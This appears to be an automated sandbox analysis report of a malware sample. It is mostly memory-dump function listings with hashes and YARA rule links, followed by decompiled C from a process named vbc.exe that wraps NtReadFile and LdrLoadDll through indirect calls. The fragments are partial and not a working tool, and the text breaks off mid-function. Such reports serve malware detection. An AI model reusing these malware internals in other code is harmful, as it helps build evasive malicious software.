                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID: -
                                    • API String ID: 0-2547889144
                                    • Opcode ID: 58793265f5207e8682076f991636fcc1e5c9f4cf36dce5f0dfe2f45cddb1c63f
                                    • Instruction ID: 4cc7121046c7d07abb8c942ef746a2f26fe1869f760dad5f1bcb0eb303f0646f
                                    • Opcode Fuzzy Hash: 58793265f5207e8682076f991636fcc1e5c9f4cf36dce5f0dfe2f45cddb1c63f
                                    • Instruction Fuzzy Hash: B8411DB1E056588BEB5DCF6B8C4078EFAF7AFC9200F54C1BAD40DAA254DB700A858F11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0100A90E, Relevance: .9, Instructions: 852COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2172178218.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                    • Associated: 00000004.00000002.2172172274.0000000001000000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.2172288814.00000000010F4000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 66f2d2e53a62074e43ecdafab8138336a2cb973a97556c384df59c0cf8844ceb
                                    • Instruction ID: 2e41d1f17b4ce381e53a2fee3577c3ffe2dc4eac39f91a9ddce69135c1c1940d
                                    • Opcode Fuzzy Hash: 66f2d2e53a62074e43ecdafab8138336a2cb973a97556c384df59c0cf8844ceb
                                    • Instruction Fuzzy Hash: 9762893204E7C28FD7138B789DB26D5BFB2EE4322471D49CBD8C14B563D621496ADB22
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 010063D1, Relevance: .8, Instructions: 769COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2172178218.0000000001002000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true
                                    • Associated: 00000004.00000002.2172172274.0000000001000000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.2172288814.00000000010F4000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7131267647effa950dc82fafba43b1608ba035d5062575f686e2e35c6d2a6830
                                    • Instruction ID: f691a3179348d568ac5cefb282c0bbc02faafe72a28dfd3a60229da701a58bb9
                                    • Opcode Fuzzy Hash: 7131267647effa950dc82fafba43b1608ba035d5062575f686e2e35c6d2a6830
                                    • Instruction Fuzzy Hash: ED52C8A694E3C19FCB131B786DB52D4BFB29E67114B1E08C7C0C1CE0A7E118199BCB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B92F8, Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aaa3621a48e8c81ab854cdd480894b36c5f9fb6e30b89a162bb57e5a14cd923a
                                    • Instruction ID: 80f382c53175f8e497e5ae852de63e11057b1d3b5510f65713860aaf4a18ea8d
                                    • Opcode Fuzzy Hash: aaa3621a48e8c81ab854cdd480894b36c5f9fb6e30b89a162bb57e5a14cd923a
                                    • Instruction Fuzzy Hash: 96C13B74E142198BCB10DFA9D6809ADFBF2BF89304F248569D909A7356D730AD42CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B92EA, Relevance: .3, Instructions: 252COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 49ada604b15304cf44c1961d5b041e67278f7c3ed63801ac0f45a96982514c7e
                                    • Instruction ID: ad8c09731cac0eae0fb4e0a47c6de6183189c5f4dfd6160d60ae9a93afd91f7c
                                    • Opcode Fuzzy Hash: 49ada604b15304cf44c1961d5b041e67278f7c3ed63801ac0f45a96982514c7e
                                    • Instruction Fuzzy Hash: 04C14D74E142598BCB10DFA9C6809AEFBF2BF89304F24C569D809A7356D730AD42CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B4431, Relevance: .2, Instructions: 167COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d5588d93abe438be9f24a4f2c0428acc3a86b9d8102bbf2c7066c4a9e6ed0816
                                    • Instruction ID: a8397086db7fe8f807f2cbed83c2a4b7b33e24dcccdd4ab6c12aca230b45e5cc
                                    • Opcode Fuzzy Hash: d5588d93abe438be9f24a4f2c0428acc3a86b9d8102bbf2c7066c4a9e6ed0816
                                    • Instruction Fuzzy Hash: BB612175D0A7589BDB29CF7B8D5528DBFF3AFC5201F08C5AFC84896256EA3005868F01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B2B98, Relevance: .2, Instructions: 166COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0e40a838879a7dc786bcf7c93d942f61caf3e397fb80a91f14f04e70d79089f5
                                    • Instruction ID: a232e920f3c6dc08ced99dc73817bdc017a128825f9a086b1296479980822bf1
                                    • Opcode Fuzzy Hash: 0e40a838879a7dc786bcf7c93d942f61caf3e397fb80a91f14f04e70d79089f5
                                    • Instruction Fuzzy Hash: 3D71E170D0421ADFCB44CFA9D5808EEFBB1FF89320F24895AD415AB215D738A982DF95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B2B89, Relevance: .2, Instructions: 163COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 26999c78e6b098c45d6c381656f491740841f0447c2bc2a0109c878e2f4ad68b
                                    • Instruction ID: 30c11a79663b5bed78277ff357947f9fa9328feb3e6cb288b5f0e225cdf35bfc
                                    • Opcode Fuzzy Hash: 26999c78e6b098c45d6c381656f491740841f0447c2bc2a0109c878e2f4ad68b
                                    • Instruction Fuzzy Hash: FF610570D0421ADFCB44CFA9C5808EEFBB1FF89320F24895AD415AB255D738A982DF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B8980, Relevance: .2, Instructions: 162COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 52f564c7d4efc1e497aa1f69d31b2563a566ec3a1556d1653647c93b20b8fb4f
                                    • Instruction ID: 716cd992dce9d18befbbcd98ebb8f4c12fdb846f095835416df7a4ce82280191
                                    • Opcode Fuzzy Hash: 52f564c7d4efc1e497aa1f69d31b2563a566ec3a1556d1653647c93b20b8fb4f
                                    • Instruction Fuzzy Hash: 6C514B70E1121A8FCB04CFE9D5406EEFBFAAB88320F14D826D515A7354DB349941CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B896F, Relevance: .2, Instructions: 162COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 33aef0f8f48a6cfaa25a29bb0125346615b2dfc9d6acf2af88129432c269a747
                                    • Instruction ID: 25b6b28887623d96c41b161587bba65cf46e05c6ad643a340743096e00d257d3
                                    • Opcode Fuzzy Hash: 33aef0f8f48a6cfaa25a29bb0125346615b2dfc9d6acf2af88129432c269a747
                                    • Instruction Fuzzy Hash: 3A513970E0120A9FCB04CFE9D6406EFFBFAAB88324F14D826D515A7255DB349945CFA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B9ED8, Relevance: .1, Instructions: 129COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3372545d08694d590352e145b2cdda344d443ffd5c9a5d16185fcc2e0aff43e6
                                    • Instruction ID: 23e053554b6c78e696c8c91cf39b97d0aba0c6a872da686705f02cf113250271
                                    • Opcode Fuzzy Hash: 3372545d08694d590352e145b2cdda344d443ffd5c9a5d16185fcc2e0aff43e6
                                    • Instruction Fuzzy Hash: FB516C70E001198BDB14CFAACA805AEFBF2BF89314F24C16AD418A7215D7305942CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B9ECA, Relevance: .1, Instructions: 123COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3aa25c8dcbb8d58a90d8d2c09053bc91026b6688bf130741e1d4e4ecbbce16b9
                                    • Instruction ID: e76502cdadba324d68ad0450a6f37e572290c63e91e77aa1854d61bb5723d3e4
                                    • Opcode Fuzzy Hash: 3aa25c8dcbb8d58a90d8d2c09053bc91026b6688bf130741e1d4e4ecbbce16b9
                                    • Instruction Fuzzy Hash: 6C515A70E141598BDB14CFAACA805AEFBF2BF89304F24C1AAD858A7256D7305D42CF61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B3238, Relevance: .1, Instructions: 119COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b86e5b33aa4b934e51afb4e53f6ada1008c697b86b5811c161513b0112190ec3
                                    • Instruction ID: 9d2695a1691cf91e78e7f37862efd51d700d9d39c6b5e75ac2d499f49db3f571
                                    • Opcode Fuzzy Hash: b86e5b33aa4b934e51afb4e53f6ada1008c697b86b5811c161513b0112190ec3
                                    • Instruction Fuzzy Hash: B351E6B4E0420A9FCB48CFAAC5815EEFBF2FF88350F24D92AC515A7254D7349A418F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B3236, Relevance: .1, Instructions: 116COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4f771a57c339e84ff3bee8379cc5116f440df992b2a6359f4f363e55a86f1cfe
                                    • Instruction ID: 9234643be8703f0c7183dabfcfe459d3c71224b96839e66db695eab275c7af1b
                                    • Opcode Fuzzy Hash: 4f771a57c339e84ff3bee8379cc5116f440df992b2a6359f4f363e55a86f1cfe
                                    • Instruction Fuzzy Hash: 7441F7B4E0420A9FCB48CFAAC5815EEFBF2BF88350F24C52AC515E7254D73496418F94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B8C20, Relevance: .1, Instructions: 111COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a5bb95e8c370eecc970dd2295be4504fa4f7dc350928106bf3134f35414a1ac6
                                    • Instruction ID: 4cd2cd331a9347b7bec9caa07abaac33555d53f06bc7deb21b7e01e73c6d035a
                                    • Opcode Fuzzy Hash: a5bb95e8c370eecc970dd2295be4504fa4f7dc350928106bf3134f35414a1ac6
                                    • Instruction Fuzzy Hash: 97411874E11218DFDB58CFA9D941B9EBBF6BF88310F1484AAD509A7264DB305A41CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B3720, Relevance: .1, Instructions: 108COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b55eb74ffe7df04c1efe9665ecec6529a61e4d1ce1ebe3cbff9b47373b503a41
                                    • Instruction ID: 4f8c790f896cf0705c7ecb93fbed8e116c71f93ba61398a85d7ebae79a6e78bc
                                    • Opcode Fuzzy Hash: b55eb74ffe7df04c1efe9665ecec6529a61e4d1ce1ebe3cbff9b47373b503a41
                                    • Instruction Fuzzy Hash: A841E8B0D0560ADBCB04CFAAC6815EEFBF2BF89310F24C56AD405B7254D7349A418F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B44E8, Relevance: .1, Instructions: 106COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5576c015049c3eca679f67cb799dd1f68afd8c73ce9e5fc339273b4389709f4f
                                    • Instruction ID: dba59f1675edbf0d634f4cf0c56f61e0ac7e6370bd4a899b380ecda9ee8bdf8f
                                    • Opcode Fuzzy Hash: 5576c015049c3eca679f67cb799dd1f68afd8c73ce9e5fc339273b4389709f4f
                                    • Instruction Fuzzy Hash: 18414E71E11618CBEB18CF6B8D4429EFBF7AFC9301F14C1BA850CA6225EB341A859F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B8C10, Relevance: .1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dbd7eebbc3ab000cc394daedd81a15918adf63b2e4b241b4975af35d5d98ca77
                                    • Instruction ID: 06bc84e00e27abd33c0bdf7b7762d5e9e84661feb1e7ab08baa63a9d05af15a1
                                    • Opcode Fuzzy Hash: dbd7eebbc3ab000cc394daedd81a15918adf63b2e4b241b4975af35d5d98ca77
                                    • Instruction Fuzzy Hash: 894168B4E11218DFDB58CFA9C940B9EBBF6BF89310F1484AAD408A7365DB305A41CF60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B371E, Relevance: .1, Instructions: 105COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1fc4bd8a979042cbc5365f246de54774e1ca7accd3ac5f08254b2a80342d210
                                    • Instruction ID: 64ed81f05aa64a89d82eb8c6fbb4be3c3487755a6f69426b7e997620599efd85
                                    • Opcode Fuzzy Hash: b1fc4bd8a979042cbc5365f246de54774e1ca7accd3ac5f08254b2a80342d210
                                    • Instruction Fuzzy Hash: B741E8B4E0560ADBCB04CFAAC6815EEFBF2BF88310F24C56AD405B7254D7349A818F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001E6480, Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c71ab66a125f8a7370d2f835dcdc85c96401c4b5f0981fa3bbfb2340c2ff87ba
                                    • Instruction ID: 7ea70abb99d6cfa6e710df61931468662c7184d12391c26c5d9a90eef8bcdc3c
                                    • Opcode Fuzzy Hash: c71ab66a125f8a7370d2f835dcdc85c96401c4b5f0981fa3bbfb2340c2ff87ba
                                    • Instruction Fuzzy Hash: 06412E71E056548BEB5DCF6B9C4479AFAF7AFC9300F14C1BAC40CAA255DB7006868F11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BD8C0, Relevance: .1, Instructions: 84COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ee72a7b4cb238940901ad4c95358dda70cc938a08909a2e830867b6070ec609
                                    • Instruction ID: 04e302e219743205f043df5e1c9af89f0d12c3cb4a7ed45e153ba14a00912ad2
                                    • Opcode Fuzzy Hash: 5ee72a7b4cb238940901ad4c95358dda70cc938a08909a2e830867b6070ec609
                                    • Instruction Fuzzy Hash: 96314470C07218CBDB00CFA5C588BEDBAF5AF0A324F105429E405B3291E7788980DF55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001EE3D0, Relevance: .1, Instructions: 67COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171330285.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 008ba25475cbfe29e6618ff6917bf81c14a6bbe9a2f49b960057f8a730a1f9b2
                                    • Instruction ID: 3387ef3d8811dd4313882b2cd09c3510bd309ac23e76a9d1db86a7c9089166c5
                                    • Opcode Fuzzy Hash: 008ba25475cbfe29e6618ff6917bf81c14a6bbe9a2f49b960057f8a730a1f9b2
                                    • Instruction Fuzzy Hash: 7421BC71E056589BEB19CF6B9C506DEFBF3AFC9200F14C17AC908A6265EB3405468F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B7B78, Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f7afdf4aabe5a64fbed0c5f556dbbcd06b459517f6f71d399f0d388741eebae2
                                    • Instruction ID: d25d3b7a3159e3c2673e37072aa027ae49977963b83c9791e3ae88a672d86d49
                                    • Opcode Fuzzy Hash: f7afdf4aabe5a64fbed0c5f556dbbcd06b459517f6f71d399f0d388741eebae2
                                    • Instruction Fuzzy Hash: B0111771E156199BDB18CFAAD9446DEFBF7ABC8310F14C13AD508A7214EB305A42CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B7B6A, Relevance: .1, Instructions: 59COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65e81c182d41d235f77cd7f25c34a9aff97f0c1c12a0ddc2dea61fc8ad05ecc0
                                    • Instruction ID: 7af09155c3a3ea6f6908dff8a936ddfc52b19d0d9dbce5f650c4baf6d6e233c8
                                    • Opcode Fuzzy Hash: 65e81c182d41d235f77cd7f25c34a9aff97f0c1c12a0ddc2dea61fc8ad05ecc0
                                    • Instruction Fuzzy Hash: 09216A70E156199FDB09CFAAC94069EFAF7ABC9310F14C17AC408A7261EB344A46CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009B38F1, Relevance: .1, Instructions: 55COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e075ed82a0ccf8add9b10eb7f07f287f79574b48f32de34c70a68e2b6315d835
                                    • Instruction ID: f61b6ee6582a6d7903394716c969ff59b947b93cd136bd6d3b04a52738edf817
                                    • Opcode Fuzzy Hash: e075ed82a0ccf8add9b10eb7f07f287f79574b48f32de34c70a68e2b6315d835
                                    • Instruction Fuzzy Hash: 9311DD71E046189BEB1CCF6BD94479EFAF3AFC8200F04C17AC808A6265EB741546CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 009BDA40, Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.2171746995.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7f3e2f387edd71e332250eb2a9892211e0abcbd0e5abab93567ce5635bfc083e
                                    • Instruction ID: 880276d48e5fca9de99a48a269ed2b04e105d8ebe17d6b38b062eedbc4049563
                                    • Opcode Fuzzy Hash: 7f3e2f387edd71e332250eb2a9892211e0abcbd0e5abab93567ce5635bfc083e
                                    • Instruction Fuzzy Hash: 31117C30D092188BDB14CFA5C908BEEFBF4AB4E310F289069D401B3290D7788A84DF68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: vbc.exe PID: 2440 Parent PID: 2792 vbc.exeCOMMON

                                    Executed Functions

                                    Function 004182AC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E004182AC(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, intOrPtr _a40, intOrPtr _a44) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t22;
				void* _t32;
				void* _t33;
				intOrPtr* _t34;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t34 = _a8 + 0xc48;
					E00418DB0(_t32, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
					_t6 =  &_a36; // 0x413d42
					_t12 =  &_a12; // 0x413d42
					_t22 =  *((intOrPtr*)( *_t34))( *_t12, _a16, _a20, _a24, _a28, _a32,  *_t6, _a40, _a44, _t33); // executed
					return _t22;
				} else {
					__ebp = __esp;
					__eax = _a4;
					_t14 = __eax + 0x10; // 0x300
					_t15 = __eax + 0xc4c; // 0x40972f
					__esi = _t15;
					E00418DB0(__edi, _a4, __esi,  *_t14, 0, 0x2b) =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, __ebp);
					_pop(__esi);
					__ebp = __esi;
					return  *__esi;
				}
			}









                                    0x004182ae
                                    0x00418262
                                    0x00418263
                                    0x0041826f
                                    0x00418277
                                    0x00418282
                                    0x0041829d
                                    0x004182a5
                                    0x004182a9
                                    0x004182b0
                                    0x004182b1
                                    0x004182b3
                                    0x004182b6
                                    0x004182bf
                                    0x004182bf
                                    0x004182cf
                                    0x004182d5
                                    0x004182d7
                                    0x004182d8
                                    0x004182d9
                                    0x004182d9

                                    APIs
                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: B=A$B=A
                                    • API String ID: 2738559852-2767357659
                                    • Opcode ID: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                    • Instruction ID: 196597b99329607a985bdc56155312d81ebdbcd7e96d663e18f2c25ff9a64cf5
                                    • Opcode Fuzzy Hash: 0b48b82a155b178348f88d6e01bf6d675ca2b8fa2818eeb685312e8f3d0cc14c
                                    • Instruction Fuzzy Hash: F9110972200204AFCB14DF99DC85EEB77A9EF8C754F158659BA1D97241CA30E911CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 21%
                                    			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				asm("in al, dx");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}







                                    0x00418262
                                    0x00418263
                                    0x0041826f
                                    0x00418277
                                    0x00418282
                                    0x0041829d
                                    0x004182a5
                                    0x004182a9

                                    APIs
                                    • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: B=A$B=A
                                    • API String ID: 2738559852-2767357659
                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                    • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00409B10(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                    0x00409b2c
                                    0x00409b2f
                                    0x00409b34
                                    0x00409b39
                                    0x00409b43
                                    0x00409b48
                                    0x00409b4b
                                    0x00409b4d
                                    0x00409b55
                                    0x00409b5a
                                    0x00409b5a
                                    0x00409b61
                                    0x00409b69
                                    0x00409b6c
                                    0x00409b6e
                                    0x00409b82
                                    0x00000000
                                    0x00409b84
                                    0x00409b8a
                                    0x00409b3e
                                    0x00409b3e
                                    0x00409b3e

                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                    • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                    • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
